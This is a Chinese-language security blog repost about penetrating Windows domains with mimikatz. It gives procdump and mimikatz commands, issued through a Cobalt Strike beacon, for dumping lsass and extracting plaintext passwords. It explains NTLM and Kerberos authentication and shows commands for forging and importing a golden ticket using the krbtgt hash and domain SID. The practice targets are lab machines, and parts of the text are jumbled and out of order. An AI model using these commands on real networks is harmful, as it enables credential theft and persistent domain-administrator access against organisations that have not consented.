内网渗透之mimikatz

admin
admin
admin
138655
文章
114
评论
2022年8月28日20:27:42评论57 views字数 2111阅读7分2秒阅读模式

  1. 使用 procdump64+mimikatz 获取 win 用户明文密码

    1. beacon> shell procdump64.exe -accepteula -ma lsass.exe lsass.dmp-accepteula 参数:指定是否自动接受 Microsoft 软件许可条款。所有无人参与安装都需要此设置。-ma 参数:生成 full dump, 即包括进程的所有内存. 默认的 dump 格式包括线程和句柄信息.

    2. beacon>shell mimikatz.exe "sekurlsa::minidump lsass.dmp""sekurlsa::logonPasswords full" exit >pass.txt

    3. download pass.txt  查看密码beacon>shell mimikatz.exe "sekurlsa::minidump lsass.dmp"

  2. AD域认证

    1. 内网渗透之mimikatz

    2. 1.客户端计算用户密码,生成NTLM HASH

    3. 2.客户端将用户名发给应用服务器

    4. 3.应用服务器返回Nonce随机值给客户端

    5. 4.客户端使用NTLM HASH加密Nonce ,然后发回给应用服务器

    6. 5.APP服务器将用户名+Nonce +加密的Nonce全部发给DC

    7. DC使用用户的NTLM HASH 加密Noncxxxxxxxx收到的加密Nonce对比,相同则认证成功

    8. 1内网渗透之mimikatz

    9. Kerberos身份认证

    10. 接下来KDC执行以下检查

    11. 如果检查成功,TGS向客户端返回TGS_REP,其中包含三部分内容:

    12. .至此 KDC认证过程结束,客户端获得了会话密钥+ST,接下来开始服务认证过程

    13. DC返回AS_REP,包含用户NTLM HASH加密的会话密钥+TGT (Ticket GrantingTicket) ; TGT包含用户、组成员、域、时间戳、客户端IP、会话密钥等信息。TGT使用KDC独有的安全密钥加密,客户端无法TGT生存周期为10小时,周期自动刷新(缓存于客户端)

    14. 1.用户登录域内计算机时,基于密码生成NTLM HASH。向DC发送AS_REQ,其中包含用户名+NTLM HASH 加密的时间戳;DC使用用户的NTLM HASH解密时间戳,如果解密成功且时间戳不重复(防重放攻击),则认证成功


    16. 3.用户需要访问域内资源时(SPN),再次联系KDC;向其请求服务票据TGS_REQ,其中包含会话密钥加密的当前用户名和时间戳+资源SPN+ TGT

    17. 4.如果SPN存在(不验证用户是否有权访问SPN) , KDC解密TGT获得会话密钥,用会话密钥解密出用户名和时间戳,接下来KDC执行以下检查:

    18. 5.客户端向应用服务器发起AP_REQ,其中包含会话密钥加密的用户名和时间戳+ST(包含会话密钥)

    19. 6.应用服务器使用服务帐户密码的 HASH 解密ST,获得用户名+会话密钥,使用会话密钥解密AP_REQ中的用户名,如果用户名与从ST解密得到的用户名一致,请求被接受。授予访问权限之前,服务检查ST中提供的组成员关系,并为用户分配适当的权限,至此用户P267022可以访问请求的服务了

    20. TGT中的时间戳有效(无重放攻击,且未过期)

    21. TGS_REQ和TGT中的用户名一致

    22. 客户端IP与TGT中的客户端IP一致

    23. 授权访问的 SPN

    24. 客户端和SPN之间使用的会话密钥

    25. 包含用户名和组成员关系以及新创建的会比出销的服务票据ST

    26. 前两个部分(SPN +会话密钥)使用TGT 中的会话密钥加密。ST使用SPN 服务帐号的NTLM HASH加密,并缓存于客户端

    27. Kerberos

    28. NTLM

  3. 黄金票据

    1. cs制作(红日靶机三)

    2. msf制作(红日靶机四)

    3. 权限机器->右键->Access->Golden Ticket内网渗透之mimikatz

    4. logonpasswords

    5. 内网渗透之mimikatz

    6. 内网渗透之mimikatz

    7. 内网渗透之mimikatz

    8. load kiwidcsync_ntlm krbtgt//制作前建议把所有凭证清除kerberos::purge内网渗透之mimikatzgolden_ticket_create         //看看要设置哪些东西golden_ticket_create -d demo.com -u Administrator -s S-1-5-21-979886063-1111900045-1414766810-502 -k 7c4ed692473d4b4344c3ba01c5e6cb63 -t /root/golden.tck//golden_ticket_create -d 域全名 -u 伪造用户 -s 域SID -k "NTLM hash" -t  导出位置

    9. 导入黄金票据

    10. 票据验证

    11. ‍kerberos_ticket_use /root/golden.tck

    12. dir WIN-ENS2VR5TR3Nc$可以访问成功

    13. 制作

    14. 域名称

    15. 域的SID值

    16. 域的KRBTGT账户NTLM密码哈希

    17. 伪造用户名

    18. 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证

    19. 黄金票据的条件要求:

    20. 黄金票据的作用黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。

    21. 票据的制作

  4. 部分图片来自于互联网

  5. 欢迎大家加入内网渗透之mimikatz



原文始发于微信公众号(乌托邦安全团队):内网渗透之mimikatz

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月28日20:27:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透之mimikatzhttps://cn-sec.com/archives/1256809.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息